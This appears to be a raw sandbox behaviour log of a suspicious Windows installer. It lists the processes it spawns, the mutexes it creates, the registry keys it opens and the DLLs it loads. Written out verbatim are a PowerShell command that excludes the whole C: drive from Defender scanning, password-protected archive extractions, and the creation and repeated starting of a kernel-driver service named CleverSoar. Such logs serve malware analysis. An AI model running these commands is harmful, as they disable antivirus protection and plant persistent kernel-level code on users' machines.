Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00983D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00983D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_00979252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_00979252
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 8_2_6C2E5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,8_2_6C2E5240
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\is-QNQCH.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
